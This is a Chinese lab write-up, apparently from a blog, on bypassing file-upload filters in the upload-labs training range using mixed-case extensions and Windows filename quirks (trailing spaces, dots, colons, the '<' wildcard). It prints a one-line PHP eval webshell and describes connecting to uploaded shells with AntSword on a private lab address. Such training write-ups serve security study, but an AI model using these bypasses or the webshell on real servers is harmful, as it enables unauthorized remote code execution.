700字范文,内容丰富有趣,生活中的好帮手!
700字范文 > 渗透测试-文件上传之大小写和window特性绕过(三)

渗透测试-文件上传之大小写和window特性绕过(三)

时间:2020-06-20 06:04:11

相关推荐

渗透测试-文件上传之大小写和window特性绕过(三)

文件上传之大小写和window特性绕过

文件上传upload-labs实验室第6,7,8关

文章目录

文件上传之大小写和window特性绕过前言一、什么是window特性二、大小写和window特性绕过 1.大小写绕过2.利用空格和点绕过总结

前言

一、什么是window特性

window特性就是window对于文件的后缀名自动的修改,例如空格和点,冒号后面的内容都省略掉,可以利用window特性进行绕过。

二、大小写和window特性绕过

1.大小写绕过

第六关没有限制大小写,可以进行大小写绕过

上传文件zhi.PhP

上传成功。

复制网址到蚁剑进行连接

http://192.168.222.4/upload/upload/04160654088873.PhP

连接成功,成功拿到shell。

这里补充关卡四,实验还有另一个方法,也可以行的通就是利用window特性冒号进行绕过。

第一步

上传58.jpg文件

第二步

用burp抓包,修改后缀名,修改为58.php:.jpg重发

修改成功,成功上传58.php文件,将58.php:.jpg解析成.php文件,冒号后面的内容都会省略掉,会生成.php文件

在burp上再修改为58.<进行重发

再查看文件大小,原来上传的时候是0kb,再上传是大小增加了

打开文件查看,里面存在一句话木马

<?php @eval($_POST['chopper']); ?>

复制网址上传到蚁剑进行连接

http://192.168.222.4/upload/upload/58.php

连接成功,成功拿到shell。

关卡四的实验原理很简单,利用window和php环境的叠加特性,以下符号在正则匹配时的相等性:

双引号’’ = 点号.

大于符号> = 问号?

小于符号< = 星号*

上面则是用了<号,再次上传58.<,重写58.php内容,webshell代码就会写入原来的空文件中。

2.利用空格和点绕过

接下来进行第七关

看一下源代码,发现没有限制空格

利用空格进行绕过,在window中,空格会自动省略

上传zhi.PhP文件,进行抓包修改文件后缀名

在zhi.PhP后面加上空格和点

找到路径

…/upload/04160636393878.php

复制网址到蚁剑进行连接

http://192.168.222.4/upload/upload//04160748393371.php

连接成功,成功拿到shell。

第八关

查看源码可知没有限制点,利用点进行绕过

上传58.jpg文件,进行抓包修改为58.php.

复制网址到蚁剑连接

http://192.168.222.4/upload/upload/58.php

连接成功,成功拿到shell。

总结

本次实验是对文件上传漏洞进一步提升练习,学会了window特性方法的绕过,介绍了几种常用的绕过方法。

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。